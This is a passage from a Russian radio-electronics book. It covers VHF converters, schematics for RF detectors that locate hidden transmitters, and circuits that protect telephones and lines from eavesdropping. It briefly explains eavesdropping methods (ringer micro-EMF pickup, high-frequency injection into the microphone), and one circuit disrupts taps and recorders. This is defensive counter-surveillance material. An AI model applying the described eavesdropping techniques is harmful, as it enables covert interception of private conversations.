Частоту гетеродина определяют параметры контура L1, С4. Входной сигнал поступает через конденсатор С1 на вход преобразователя частоты. На нагрузке преобразователя резисторе RЗ выделяются суммарная и разностная составляющие сигнала. Частота гетеродина задается равной 40 МГц. При использовании приемника с диапазоном 88-108 МГц используется разностная частота, а суммарная - отфильтровывается входными цепями приемника. В нашем случае с помощью конвертера перекрывается диапазон входных сигналов от 128 МГц до 148 МГц. При необходимости можно перекрывать и другие диапазоны путем изменения частоты гетеродина. Микросхема DA1 работоспособна до частоты 200 МГц.

Катушка L1 намотана на надстроечном сердечнике от магнитопровода CБ-1a и содержит 5 витков провода ПЭВ 0,3 мм, намотанных виток к витку. Микросхему DA1 можно заменить на К174ПС4 или ее аналог SO42P.

Настройка конвертера сводится к установке частоты гетеродина из менением индуктивности катушки L1.

Миниатюрный конвертер на частоту 430 МГц

Данный конвертер во многом похож на предыдущий. Отличие со стоит в том, что в нем применена микросхема К174ПС4, позволяющая принимать сигнал с частотой до 1 ГГц. Принципиальная схема устройства приведена на рис. 2.61.

Входной сигнал с антенны поступает на катушку L1. С катушки сигнал снимается одновременно на оба входа микросхемы. Частота гетеродина устанавливается элементами С1, С2, С3, L2. Нагрузкой преобразователя служит колебательный контур L3, С4, настроенный на частоту в диапазоне 88-108 МГц. Через конденсатор С5 преобразованный сигнал поступает на вход приемника. Конвертер имеет высокую чувствительность и малые габариты. Катушка L1 сделана из провода ПЭВ 0,8 мм длиной 30 мм. Ее конструкция и расположение приведены на рис. 2.62.

Катушка L2 бескаркасная с внутренним диаметром 2 мм, намотана проводом ПЭВ 0,23 и содержит 6 витков. Катушка L3 намотана на корпусе надстроечного конденсатора С4 проводом ПЭВ 0,23 и содержит 10 витков с отводом от середины. Катушка L1 может быть выполнена печатным способом.

Рис. 2.58 УКВ конвертер на двух полевых транзисторах

Изображение: 

Рис. 2.59 УКВ конвертер на одном полевом транзисторе

Изображение: 

Рис. 2.60 УКВ конвертер на специализированной микросхеме

Изображение: 

Рис. 2.61 Схема миниатюрного конвертера на частоту 430 МГц

Изображение: 

Рис. 2.62 Миниатюрный конвертер на частоту 430 МГц

Изображение: 

4. Глава 3. Технические средства защиты информации

Глава 3. Технические средства защиты информации

Вудь вы предпринимателем-бизнесменом, работником государственного сектора, политиком или просто частным лицом, вам должно быть интересно знать, как защитить ceбя от утечки конфиденциальной информации, какими средствами для этого нужно пользоваться, как выявить каналы утечки этой информации. Ответ на эти и другие вопросы по защите информации вы получите в данной главе, которая имеет четыре раздела.

В первом разделе даны описания, принципы работы и настройка детекторов радиоизлучений, с помощью которых можно обнаруживать активизированные каналы утечки информации.

Второй раздел посвящен защите телефонных линий связи и непосредственно телефонных аппаратов. Телефон - неотъемлемая часть нашей жизни, по телефонным каналам идут потоки разнообразной информации, и именно поэтому важно защищать их от использования вам во вред.

Третий раздел посвящен специальным защитным устройствам, снижающим эффективность систем получения информации по оптическим каналам.

Четвертый раздел посвящен описанию устройств , также имеющих отношение к защите информации. Это сетевые фильтры для защиты от наводок и генераторы акустического шума для контроля акустических свойств помещений.

Для разработки и осуществления мероприятий по защите вашей интеллектуальной собственности от утечки информации по техническим каналам лучше всего воспользоваться услугами квалифицированных специалистов, хорошо подготовленных в рамках данного вопроса.

3.1. Детекторы радиоизлучений

3.1. Детекторы радиоизлучений

Простейший детектор радиоволн

Даже если вам нечего опасаться, но вы хотели бы выяснить, не шпионит ли кто-нибудь за вами с помощью подслушивающей радиоаппаратуры, соберите схему, показанную на рис. 3.1.

Устройство представляет собой простейший детектор радиоволн со звуковой индикацией. С его помощью можно отыскать в помещении работающий микропередатчик. Детектор радиоволн чувствителен к частотам вплоть до 500 МГц. Настраивать детектор при поиске работающих передатчиков можно путем изменения длины телескопической приемной антенны.

Телескопическая приемная антенна воспринимает высокочастотные электромагнитные колебания в диапазоне до 500 МГц, которые затем детектируются диодом VD1 типа Д9Б. Высокочастотная составляющая сигнала отфильтровывается дросселем L1 и конденсатором С1. Низкочастотный сигнал поступает через резистор R1 на базу транзистора VT1 типа КТ315, что приводит к открыванию последнего и, как следствие, к открыванию транзистора VT2 типа КТ361. При этом на резисторе R4 появляется положительное напряжение, близкое к напряжению питания, которое воспринимается логическим элементом DD1.1 микросхемы DD1 типа К561ЛА7 как уровень логической единицы. При этом включается генератор импульсов на элементах DD1.1, DD1.2, R5 и С3. С его выхода импульсы с частотой 2 кГц поступают на вход буферного каскада на элементах DD1.3, DD1.4. Нагрузкой этого каскада служит звуковой пьезокерамический преобразователь ZQ1 типа ЗП-1, который преобразует электрические колебания частотой 2 кГц в акустические. С целью увеличения громкости звучания преобразователь ZQ1 включен между входом и выходом элемента DD1.4 микросхемы DD1. Питается детектор от источника тока напряжением 9 В через параметрический стабилизатор на элементах VD2, R6.

В детекторе используются резисторы типа МЛТ-0,125. Диод VD1 можно заменить на ГД507 или любой германиевый высокочастотный. Транзисторы VT1 и VT2 могут быть заменены на КТ3102 и КТ3107 соответственно. Стабилитрон VD2 может быть любым с напряжением стабилизации 4,7-7,0 В. Пьезокерамический преобразователь ZQ1 можно заменить на ЗП-22.

Настраивать детектор лучше всего с использованием высокочастотного генератора. Подключите к выходу генератора изолированный провод - антенну, и параллельно ему расположите антенну детектора. Таким образом вы слабо свяжете детектор с генератором. Исследуйте весь радиодиапазон, начиная с частоты 500 кГц и до точки, где детектор перестанет воспринимать радиоволны. Заметьте, как с изменением частоты изменяется чувствительность детектора.

Детектор поля со звуковой сигнализацией и регулировкой чувствительности

От предыдущего данное устройство отличается более высокой чупствительностью н возможностью регулировки чувствительности. Это устройство одновременно и сложнее вышеописанного. Принципнальная схема детектора приведена на рис. 3.2.

Сигнал, принимаемый антенной, усиливается широкополосным трехкаскадным апериодическим усилителем высокой частоты на транзисторах VT1-VT3 типа КТ3101. Усиленный сигнал с нагрузки транзистора VT3, резистора R10, через конденсатор С9 поступает на детектор, собранный по схеме удвоения напряжения на диодах VD1, VD2. Положительное напряжение с регулятора чувствительности резистора R11 поступает на диоды VD1 и VD2 типа Д9Б. Протекание небольшого начального тока через эти диоды приводит к увеличению чувствительности детектора. Одновременно это напряжение поступает на базу транзистора VT4 типа КТ315 через диод VD3 типа Д9Б и резистор R14. Базовый ток приводит к открыванию транзистора VT4. На его коллекторе устанавливается потенциал логической единицы. При увеличении уровня сигнала на входе устройства постоянное напряжение на конденсаторе С10 уменьшается. Это ведет к закрыванию транзистора VT4. Уровень логической единицы, появляющийся на коллекторе транзистора VT4, разрешает работу генератора прямоугольных импульсов на элементах DD1.1, DD1.2, R17 и C11. Положительные импульсы частотой около 2 Гц разрешают работу генератора прямоугольных импульсов на элементах DD1.3, DD1.4, R18 и С12. С выхода этого генератора прямоугольные импульсы с частотой следования 1,5-2 кГц, промодулированные частотой 2 Гц, поступают на пьзокерамичсский преобразователь ZQ1 типа ЗП-1. Питание устройства ocуществляется от параметрического стабилизатора на стабилитроне VD4 типа КС156 и резисторе R16.

В устройстве использованы резисторы типа МЛТ-0,125. Транзисторы VT1-VT3 можно заменить на КТ3120, КТ3124 или КТ368. В последнем случае уменьшается диапазон регистрируемых сигналов. Диоды VD1-VD3 могут быть любые германиевые высокочастотные. Стабилитрон VD4 может быть любым с напряжением стабилизации 5,6-7,0 В.

Настройку детектора производят по вышеприведенной методике. Верхний предел частоты регистрируемых сигналов у этого детектора может достигать 900-1000 МГц. Регулировка прибора заключается в установлении такого уровня чувствительности детектора резистором R11, при котором компенсируется фоновый уровень радиоизлучения в данном помещении. При этом звуковой сигнализатор не должен работать. При приближении детектора к источнику излучения (микропередатчику) уровень напряженности поля начинает превышать фоновый и звуковая сигнализация срабатывает.

Постой малогабаритный детектор поля с индикацией на двух светодиодах.

От описанных выше конструкций данная отличается малыми габаритами, малым количеством используемых деталой и, вместе с тем, достаточно высокой чувствительностью. В этом детекторе поля использовано новое схемное решение. Хорошо известно, что измерение ВЧ напряжений, меньших 0,5 В, затруднено тем, что уже при переменном напряжении менее 0,2-0,3 В все полупроводниковые диоды становятся неэффективными. Существует, однако, способ измерения малыхпеременных напряжений с использованием сбалансированного диодно-резистивного моста, позволяющий измерять напряжение менее 20 мВ при равномерной АХЧ до 900 МГц. Принципиальная схема устройства, использующего данный способ, приведена на рис. 3.3.

Основу данного устройства составляет микросхема DА1 типа КР1112ПП2. Эта микросхема включает в себя устройство, определения баланса электрического моста с индикацией. Микросхема имеет встроенный источник опорного напряжения.

Сигнал, наводимый в антенне, усиливается широкополосным апериодическим усилителем высокой частоты на транзисторе VT1 типа KT3101. Усиленное переменное напряжение высокой частоты через конденсатор СЗ поступает в диодно-резистивный мост на диодах VD1- VD4 типа ГД507 и резисторах R3-R5. От источника опорного напряжения (вывод 3 микросхемы DA1) через резисторы R3-R5 и диоды VD1-VD4 протекает небольшой (примерно несколько микроампер) прямой ток, который улучшает условия детектирования и увеличивает чувствительность детектора. В выпрямлении измеряемого переменного напряжения участвуют только диоды VD1 и VD2, а два других - VD3, VD4 - образуют соседнее плечо моста, на котором создается начальное напряжение, балансирующее мост, и одновременно служат для его термокомпенсации. Все диоды подобраны с возможно более близкими вольт-амперными характеристиками. Конденсатор С4 отфильтровывает переменную составляющую выпрямленного напряжения. Резистор R4 служит для точной балансировки моста. При хорошей балансировке устройство будет реагировать только на напряжение, являющееся результатом выпрямления измеряемого сигнала. Выпрямленное напряжение и напряжение, балансирующее мост, через резисторы R7 и R8 поступают на входы усилителя постоянного тока, расположенного в микросхеме DA1. В зависимости от состояния баланса моста сигнал индикации поступает на один из светодиодов VD5 или VD6 - типа АЛЗО7. Таким образом, при балансе моста (отсутствие сигнала) включен светодиод VD5, а при наличии сигнала (нарушение баланса моста) - светодиод VD6.

В качестве диодов VD1-VD4 можно использовать любые высокочастотные диоды. Светодиоды могут быть любого типа. В качестве источника питания используется источник постоянного тока напряжением 2,5-5 В.

Детектор поля с линейной шкалой из восьми светодиодов, регулировкой чувствительности и звуковой индикацией

Данное устройство имеет некоторое сходство с описанным выше. Так, имеется усилитель ВЧ и детектор на сбалансированном резистивно-диодном мосте. Отличительной особенностью данного детектора поля является: фильтр высокой частоты на входе, усилитель постоянного тока на двух операционных усилителях, звуковой генератор, линейная светодиодная шкала и индикатор разряда батареи. Все это делает данное устройство несомненно более простым и удобным в эксплуатации. Принципиальная схема детектора поля приведена на рис. 3.4.

Сигнал, принимаемый антенной, поступает на фильтр высокой частоты на элементах С2, L1, С3, L2, необходимый для подавления сигналов частотой менее 20 МГц. Это необходимо для уменьшения уровня низкочастотных сигналов, обычно составляющих фоновое радиоиз.чучение. С ФВЧ сигналы частотой более 20 МГц поступают на вход апериодического широкополосного усилителя высокой частоты, собранного на транзисторе VT1 типа КТ3101. С нагрузки усилителя pезистора R2 - напряжение высокой частоты через конденсатор С5 поступает на диоды VD1, VD2 типа ГД507, входящие в состав резистивно-диодного моста. Для балансировки моста используется резистор R4. Работа моста уже была подробно описана выше.

Продетектированное низкочастотное напряжение, сглаженное конденсатором С6, поступает на усилитель постоянного тока, выполненный на двух операционных усилителях DA1.1 и DA1.2, входящих в состав микросхемы К1401УД1. С выхода элемента DA1.1 постоянное напряжение поступает на генератор звуковой частоты, выполненный на операционном усилителе DA1.3. Частота генератора зависит от уровня постоянного напряжения на неинвертирующем входе элемента DА1.3, которое, в свою очередь, зависит от уровня входного сигнала. Таким образом, чем больше уровень входного сигнала, тем выше частота генератора звуковой частоты. С выхода генератора звуковой сигнал поступает на базу транзистора VT4 типа, КТ315, в коллекторную цепь которого включен пьезокерамический преобразователь ZQ1 типа ЗП-1.

Микросхемы DA2 и DA3 типа К1401УД1 составляют основу линейной шкалы. Операционные усилители, входящие в состав этих микросхем, включены по схеме компараторов напряжения. На неинвертирующие входы этих компараторов поступает опорное напряжение с линейки резисторов R14-R21. Другие входы компараторов соединены вместе, на них поступает постоянное напряжение с выхода усилителя постоянного тока DA1.2. При изменении этого напряжения от 0 до максимального значения происходит переключение компараторов, на выходе которых включены светодиоды VD5-VD14, образующие линейную светоизлучающую шкалу. Чем выше уровень сигнала на входе, тем больше светодиодов включено. Для уменьшения потребляемого светодиодной шкалой тока используется принцип динамической индикации. Для этого на базу транзистора VT2 типа КТ315 поступают импульсы с генератора звуковой частоты DA1.3, вызывая поочередное закрывание и открывание транзистора VT2. При закрывании транзистора VT2 положительное напряжение источника питания через резистор R32 поступает на катоды светодиодов VD5-VD14, что приводит к запиранию последних. Ток через светодиоды не течет и они гаснут. При открывании транзистора VT2 катоды светодиодов замыкаются на минус источника питания, и те светодиоды, на аноде которых присутствует положительное напряжение, загораются. Благодаря инерционным-свойствам человеческого глаза мигание светодиодов становится незаметным. Индикатор разряда батареи выполнен на элементе DА1.4 и светодиодах VD13, VD14. При снижении напряжения источника питания уменьшается ток, протекающий через стабилитрон VD15 и светодиод VD13 и, соответственно, напряжение на аноде VD13. Это вызывает включение светодиода VD14. Уровень срабатывания устанавливается подстроечным резистором R33 при настройке. Все устpoйство питается от стабилизатора, собранного на элементах VT3, VD15, VD13, R34, С8.

В устройстве использованы резисторы типа МЛТ-0,125. Светодиоды VD5-VD14 могут быть любыми. Диоды VD1-VD4 - любые высокочастотные германиевые. Катушки L1 и L2 бескаркасные, диаметром 8 мм, намотанные проводом ПЭВ 0,6 мм. Катушка L1 - 8 витков, катушка L2 - 6 витков. Резистор R4 - любой переменный резистор с линейной характеристикой. Транзисторы VT2-VT4 могут быть типа КТ3102. Стабилитрон VD15 можно заменить на КС147, КС168, КС170. Пьезокерамический преобразователь ZQ1 - любой. Можно также использовать динамическую головку сопротивлением более 50 Ом, резистор RЗ6 при этом можно из схемы исключить.

Настройка схемы особенностей не имеет. Перед началом работы необходимо настроить детектор на максимальную чувствительность резистором R4. Вращением движка резистора R4 добиваются свечения 1-2 светодиодов и выключения звуковой сигнализации. Прибор готов к работе.

Детектор поля с логарифмической шкалой на 12 светодиодах и звуковой индикацией

В состав детектора поля входят ФВЧ, усилитель ВЧ, диодный детектор, усилитель постоянного тока с логарифмической зависимостью коэффициента усиления, звуковой генератор с изменяющейся частотой и светодиодная шкала из 12 светодиодов. Детектор способен регистрировать работающие радиомикрофоны в диапазоне частот 20-600 МГц. Принципиальная схема прибора приведена на рис. 3.5.

Сигнал, наводимый в антенне, фильтруется ФВЧ на элементах С2, L1, С3, L2 и поступает на широкополосный апериодический усилитель. Последний выполнен на высокочастотном транзисторе VT1 типа КТ3101. Нагрузкой усилителя служит эмиттерный повторитель на транзисторе VT2 типа КТЗ101. Сигнал, снимаемый с регулятора чувствительности - резистора R4, поступает через конденсатор С6 на диодный детектор, собранный на диоде VD1 типа Д9Б. Высокочастотные составляющие фильтруются RC-фильтрами R5, С7 и R6, С8. Низкочастотный сигнал поступает на усилитель на микросхеме DA1 типа КР140УД1208. Коэффициент усиления этого усилителя определяется значением резистора R9. При малом уровне входного сигнала усилитель на DA1 имеет большое усиление. По мере увеличения сигнала происходит открывание диода VD2 типа КД522, сопротивление которого изменяется по логарифмическому закону. Это приводит к изменению сопротивления обратной связи также по логарифмическому закону. С выхода усилителя на микросхеме DA1 сигнал поступает на светодиодный индикатор и звуковой генератор.

Звуковой генератор выполнен на транзисторе VT3 типа КТ315 и микросхеме DD1 типа К561ЛА7. Конденсатор С9 заряжается через резистор R11 до напряжения открывания транзистора VT3. Это приводит к смене уровня логической единицы на уровень логического нуля на коллекторе транзистора VT3. При этом катод диода VD3 типа КД522 оказывается подключенным через резистор R18 к минусу источника питания. Конденсатор С9 быстро разряжается через цепь VD3, К18, что ведет за собой закрывание транзистора VT3. Конденсатор С9 снова начинает заряжаться и весь процесс повторяется. Прямоугольные импульсы преобразуются пьезокерамическим преобразователем ZQ1 типа ЗП-22 в звуковые. При увеличении напряжения на выходе усилителя DA1 уменьшается время заряда конденсатора С9 до напряжения открывания транзистора VT3, а это, в свою очередь, приводит к увеличению частоты следования импульсов генератора. Таким образом, при увеличении уровня входного сигнала происходит повышение тональности звукового сигнала.

Основой светодиодного индикатора, является микросхема DA2 типа КМ1003ПП2. Микросхема КМ1003ПП2 является специализированной и выполняет функцию управления светодиодной шкалой, обеспечивая высвечивание столбика на шкале из 12 светодиодов, которые загораются поочередно при изменении входного напряжения от минимального до максимального значения. Яркость свечения светодиодов поддерживается постоянной. Входной сигнал, через делитель напряжения на резисторах R13, R16, поступает на вход микросхемы DA2 (вывод 17). На выводы 16 и 3 микросхемы DA2 подаются уровни опорного напряжения, определяющие, соответственно, минимальное (светодиоды не горят) и максимальное (горят все светодиоды) значения входного сигнала. Питается устройство от источника питания напряжением 5,6 В. Светодиод VD4 типа АЛЗО7 служит для индикации включения прибора.

Все используемые детали малогабаритные. Детали ФВЧ описаны выше. Микросхема DA1 может быть заменена на КР1407УД2 или любой другой операционный усилитель со своими цепями коррекции. Вместо микросхемы GD1 можно применить К561ЛЕ5. При замене диода VD1 на ГД507 диапазон прибора может быть увеличен до 900 МГц. Микросхема DA2 может быть заменена на A277D.

Работа с прибором аналогична вышеприведенному устройству. Чувствительность прибора регулируется резистором R4.

Рис. 3.1 Простейший детектор поля

Изображение: 

Рис. 3.2 Детектор поля со звуковой сигнализацией и регулировкой чувствительности

Изображение: 

Рис. 3.3 Простой малогабаритный детектор поля с индикацией на двух светодиодах.

Изображение: 

Рис. 3.4 Детектор поля с линейной шкалой из восьми светодиодов, регулировкой чувствительности и звуковой индикацией

Изображение: 

Рис. 3.5 Детектор поля с логарифмической шкалой на 12 светодиодах и звуковой индикацией

Изображение: 

3.2. Защита телефонных аппаратов и линий связи

3.2. Защита телефонных аппаратов и линий связи

Одним из каналов утечки информации, и пожалуй, основным каналом, является телефонный аппарат и линия связи, соединяющая его с АТС.

Для любого специалиста, работающего в области промышленного шпионажа с применением технических средств контроля, представляют наибольший интерес так называемые "беззаходовые" системы, т. е. комплексы средств, позволяющие получать информацию из интересующих помещений без необходимости физического присутствия в них. Телефонный аппарат представляет в этом плане множество возможностей. Рассмотрим три случая решения задачи по получению необходимой информации:

  1. Телефонный аппарат содержит систему передачи информации, т. е. в его конструкцию целенаправленно внесены изменения или установлена спецаппаратура. Существуют, например, телефонные аппараты с электронными номеронабирателями, которые, по своим конструктивным особенностям, уже имеют канал утечки информации в виде паразитного высокочастотного излучения в широкой полосе частот, промодулированного звуковым сигналом.
  2. Используются определенные недостатки конструкций телефонных аппаратов для получения информации.
  3. Производится внешнее воздействие на телефонный аппарат, при котором возникает канал утечки.

Первый случай описан подробно в гл. 1. Ниже приводятся схемы защиты телефонных аппаратов и линий связи.

3.2.1. Защита телефонных аппаратов

3.2.1. Защита телефонных аппаратов

Защита звонковой цепи

Причиной появления канала утечки информации являются электроакустические преобразования. При разговоре в помещении акустические колебания воздействуют на маятник звонка, соединенного с якорем электромагнитного реле. Под воздействием звуковых сигналов якорь совершает микроколебания, что, в свою очередь, вызывает колебания якорных пластин в электромагнитном поле катушек, следствием чего становится появление микротоков, промодулированных звуком. Амплитуда ЭДС, наводимой в линии, для некоторых типов телефонных аппаратов может достигать нескольких милливольт. Для приема используется низкочастотный усилитель с частотным диапазоном 300-3500 Гц, который подключается к абонентской линии.

Для защиты от такого канала утечки информации используется схема, представленная на рис. 3.6.

Два кремниевых диода VD1 и VD2 включены встречно-параллельно в цепь звонка телефонного аппарата В1. Они образуют зону нечувствительности для микро-ЭДС. Это объясняется тем, что в интервале 0-0,65 В диод обладает большим внутренним сопротивлением (вольтамперная характеристика диодов представлена на рис. 3.7).

Поэтому низкочастотные токи, наводимые в схеме аппарата, не пройдут в линию. В то же время звуковой сигнал абонента и напряжение вызова свободно "проходят" через диоды, так как их амплитуда превышает порог открывания диодов VD1, VD2. Резистор R1 является дополнительным шумящим элементом. Подобная схема, включенная последовательно в линию связи, подавляет микроЭДС катушки на 40-50 дБ.

Вместо указанных на схеме диодов можно использовать диоды Д226, КД105, КД102.

Защита микрофонной цепи

Этот вариант получения информации связан с явлением так называемого высокочастотного навязывания. При этом относительно общего корпуса на один провод подается высокочастотное колебание (частотой более 150 кГц). Через элементы схемы телефонного аппарата, даже если трубка не снята, высокочастотные колебания поступают на микрофон, где и модулируются звуковыми колебаниями. Прием информации производится относительно общего корпуса через второй провод линии. Амплитудный детектор позволяет выделить низкочастотную огибающую Для дальнейшего усиления и записи. Схема защиты телефонного аппарата от этого метода съема информации представлена на рис. 3.8.

Так как модулирующим элементом является микрофон М1 телефонного аппарата, то для его защиты достаточно подключить параллельно микрофону М1 конденсатор С1 емкостью 0,01-0,05 мкФ. При этом конденсатор С1 шунтирует по высокой частоте микрофонный капсюль М1. Глубина модуляции высокочастотных колебаний уменьшается более чем в 10000 раз, что делает практически невозможной дальнейшую демодуляцию.

Комплексная схема защиты

Эта схема представляет собой сочетание приведенных ранее двух схем. Кроме конденсаторов и резисторов схема, представленная на рис. 3.9, содержит катушки индуктивности.

Диоды VD1-VD4, включенные встречно-параллельно, защищают звонковую цепь телефона. Конденсаторы и катушки образуют фильтры С1, L1 и С2, L2 для подавления напряжений высокой частоты.

Детали монтируются в отдельном корпусе навесным монтажом. Устройство не нуждается в настройке. Однако оно не защищает пользователя от непосредственного подслушивания - путем прямого подключения в линию.

Кроме рассмотренной схемы существует и ряд других, которые по своим характеристикам близки к ранее описанным устройствам. Ниже приведены схемы (рис. 3.10), предназначенные для комплексной защиты телефонных аппаратов и линий связи и часто используемые в практической деятельности.

3-10.gif

Изображение: 

3-6.gif

Изображение: 

3-7.gif

Изображение: 

3-8.gif

Изображение: 

3-9.gif

Изображение: 

3.2.2. Защита линий связи

3.2.2. Защита линий связи

Световой анализатор телефонной линии

Данное устройство является простейшим индикатором наличия подслушивающих устройств. Оно устанавливается на предварительно проверенной телефонной линии. Питание осуществляется от телефонной линии. При наличии любых несанкционированных подключений различных устройств, питающихся от телефонной линии, выдается сигнал тревоги (включается красный светодиод). Схема такого устройства приведена на рис. 3.11.

Устройство состоит из анализатора линии, собранного на стабилитроне VD2 типа КС530 и транзисторе VT1 типа КТ503, и усилителя тока, собранного на транзисторах VT2 и VТЗ типа КТ503 и КТ502, соответственно. К выходу усилителя через ограничительный резистор R4 подключен светодиод VD3 типа АЛ307. Выпрямительный мост VD1 типа КЦ407 обеспечивает требуемую полярность питания устройства независимо от подключения его к телефонной сети.

При свободной линии постоянное напряжение в ней около 60 В. Стабилитрон VD2 "пробивается" (открывается), и в базу транзистора VT1 подается через ограничительный резистор R1 управляющий ток. Открытый и насыщенный транзистор VT1 шунтирует вход каскада на транзисторе VT2, поэтому усилитель тока закрыт и светодиод VD3 погашен.

При подключении в линию посторонних устройств напряжение в линии падает и ток, протекающий через стабилитрон VD2, уменьшается (вплоть до закрытия последнего).

Транзистор VT1 закрывается, а в базу транзистора VT2 через резистор R2 подается управляющий ток. Усилитель открывается и светодиод VD3 включается.

Индикатор линии на микросхеме

Индикатор устанавливается в корпус телефонного аппарата и питается от телефонной линии. Он индицирует несанкционированное подключение клинии в момент ведения разговора, т. е. когда трубка снята с рычага телефона. Принципиальная схема индикатора приведена на рис. 3.12.

Основу схемы составляет операционный усилитель DA1 типа КР1407УД2, включенный по схеме компаратора напряжений. При снятии телефонной трубки напряжение с линии подается на рассматриваемое устройство через диод VD4 типа КД522, образующий со стабилитроном VD5 типа КС156 параметрический стабилизатор напряжения. Одновременно напряжение поступает через резистор R1 на неинвертирующий вход компаратора DA1. На инвертирующий вход последнего подается опорное напряжение, снимаемое с движка подстроечного резистора R3. При снижении входного напряжения до уровня , меньшего чем опорное напряжение, на выходе компаратора DA1 появляется уровень логического нуля, что вызывает включение светодиода VD3 типа АЛ307.

Диоды VD1 и VD2 совместно с резистором R1 ограничивают напряжение на неинвертирующем входе DA1 на уровнях, выходящих за пределы питающих напряжений - не более, чем на 0,7 В (на величину прямого падения напряжения на диодах VD1, VD2). Конденсатор С1 защищает схему от высокочастотных наволок в линии. Резистор R5 устанавливает режим работы микросхемы DA1. В устройстве использованы резисторы типа МЛТ-О,125 . Диоды VD1, VD2, VD4 - любые кремниевые. Стабилитрон VD5 - любой на напряжение стабилизации 4,7-7,0 В. Микросхему DA1 можно заменить на КР140УД1208, а также на любой операционный усилитель с током потребления не более 5 мА.

Устройство настраивают по методике, приведенной ниже. Сняв трубку телефонного аппарата и установив разговорное соединение (позвонив, например, знакомым), подстройкой резистора R3 добиваются погашения светодиода VD3. Медленно, изменяя сопротивление резистора R3, находят положение движка последнего, при котором устройство срабатывает. Затем немного поворачивают движок резистора R3 в обратную сторону. Светодиод снова гаснет, прибор настроен. Он будет реагировать как на параллельное подключение к линии, так и на последовательное подключение. Необходимо соблюдать полярность включения прибора!

Активный индикатор состояния линии

В отличие от вышеприведенных устройств, данное устройство не только выявляет подключение дополнительной нагрузки, но и, при срабатывании системы сигнализации, переводит устройство в активный режим работы. Этот режим позволяет блокировать многие радиоретрансляционные устройства и приборы, предназначенные для автоматической записи телефонных переговоров. Принципиальная схема такого устройства представлена на рис. 3.13.

Устройство собрано на 4-х микросхемах и 4-х транзисторах. Работа прибора описана ниже. Исходное состояние: трубка телефонного аппарата опущена. Питание устройства осуществляется от телефонной линии через ограничительный резистор R5. Конденсатор С2 заряжается через резистор R5 до напряжения стабилизщации стабилитрона, выполненного на транзисторе VT2. С конденсатора С2 напряжение величиной 7-8 В поступает на устройство для питания микросхем (точка "а"). От источника питания через резистор R6 заряжаемся конденсатор СЗ. Резисторы R6, R7, конденсатор СЗ, светодиод VD3 и транзистор VT3 образуют схему индикации устройства. Напряжение линии через диод VD1 типа КД102 поступает на делитель напряжения, образованный резисторами R1 и R2. Напряжение на резисторе R2 ограничивается транзистором VT1, включенным по схеме стабилитрона, до напряжения питания, что необходимо для защиты входов микросхем от высокого напряжения. С движка подстроечного резистора R2 напряжение высокого уровня поступает на вход элемента DD1.1 микросхемы К561ЛЕ5, запрещая проход импульсов с генератора, выполнен нога на элементе 002.1 микросхемы К561ТЛ1. Этот генератор выполнен на основе триггера Шмидта. При заряде и разряде конденсатора С1 на выходе генератора появляются прямоугольные импульсы. Поскольку заряд конденсатора С1 происходит через диод VD2 типа КД522, а разряд - через резистор RЗ, то на выходе элемента DD2.1 имеют место короткие положительные импульсы с частотой следования 1-О,5 Гц. Первый же импульс, пройдя через дифференцирующую цепочка С4, R4 и элемент DD2.2, устанавливает триггер, собранный на элементах DD1.2, DD1.3, в положение, когда на входе элемента DD2.3 низкий уровень напряжения. Генератор, собранный на DD2.3, выключен и на выводах 1,8 микросхемы DА1 типа КР1014КТ1 присутствует высокий уровень. Одновременно импульсы с DD2.1 поступают на элементы DD1.1 и DD1.4. Через DD1.1 импульсы не проходят, т. к. c резистора R2 поступает высокий уровень. Нулевой уровень, снимаемый с резистора R9 подается на входы элементов DD3.1 и DD3.3 микросхемы К561ЛА7. Поэтому импульсы, проходящие через DD1.4, не проходят на DD3.4. Следовательно, на выходе DD2.4 присутствует логический ноль, и транзистор VT3 закрыт. С движка резистора R2 снимается напряжение логической единицы, достаточное для переключения элемента DD1.1, выполняющего функцию управляемого компаратора с чувствительностью в десятки милливольт.

Если к линии подключается дополнительная нагрузка сопротивлением менее 100 кОм, то напряжение в линии уменьшится на некоторую величину. Одновременно уменьшается и напряжение на движке резистора R2. Это приводит к появлению на входе DD1.1 напряжения, воспринимаемого микросхемой как уровень логического нуля. Этот уровень разрешает прохождение импульсов от DD2.1 через DD1.1. Поскольку на выходе DD3.1 высокой уровень, то импульсы проходят через ключ DD3.2. При этом на выходе DD3.3 тоже высокий уровень и эти импульсы проходят и через ключ DD3.4. Продифференцированные цепочкой С6, R12 импульсы через элемент DD2.4 поступают на базу транзистора VT3. Транзистор открывается, и конденсатор С3 быстро разряжается через открытый транзистор VT3 и светодиод VD3, который ярко вспыхивает с частотой 0,5-1 Гц. В перерывах между импульсами конденсатор С3 подзаряжается через резистор R6. Так как оценка состояния линии происходит под управлением импульсов с генератора DD2.1, то некоторое изменение напряжения в линии в момент заряда конденсатора С3 на работе устройства не сказывается.

Рассмотрим случай, когда телефонная трубка снята. При этом со противление телефонного аппарата включается между плюсовым проводом линии и резисторами R11 и R13. Напряжение в линии уменьшается до 5-25 В, т. к, нагрузкой линии будут телефонный аппарат, резистор R13 и резистор R14, зашунтированный малым (около 10 Ом) сопротивлением микросхемы DA1. Напряжение, снимаемое с резистора R13, обеспечивает питание устройства через диод VD4 типа КД522. При этом напряжение высокого уровня с точки соединения резисторов R8,R9 поступает на элементы DD3.3 и DD3.1. Низким уровнем закрывается ключ DD3.2. С движка резистора R9 снимается напряжение логической единицы, близкое к напряжению переключения компаратора DD1.4. Допустим, что к линии подключается (или была подключена) дополнительная параллельная или последовательная нагрузка, которая приводит к уменьшению напряжения в линии. При этом напряжение на движке резистора R9 принимает уровень, расцениваемый микросхемой, как уровень логического нуля. При этом импульсы с DD2.1 проходят через DD1.4, DD3.3 и DD3.4. После дифференцирующей цепочки С6, R12 и элемента DD2.4 они поступают на базу транзистора VT3, включая световую индикацию. Одновременно, первый же импульс переводит триггер на DD1.2 и DD1.3 в состояние, разрешающее работу генератора на элементе DD2.3. С выхода генератора короткие импульсы частотой 12-20 кГц поступают на ключ, выполненный на микросхеме DА1. Ключ начинает закрываться и открываться с частотой генератора. При этом сигнал в линии модулируется этой частотой. Это вызывает расширение спектра сигнала, излучаемого радиоретранслятором, подключенным в линию. Одновременно напряжение влипни увеличивается до 35-45 В. Это связано с тем, что последовательно с резистором R13 включается резистор R14, ранее шунтированный ключом DА1. Повышение напряжения в линии до такого уровня позволяет нейтрализовать автоматические записывающие устройства, срабатмвающие по уровню напряжения в линии.

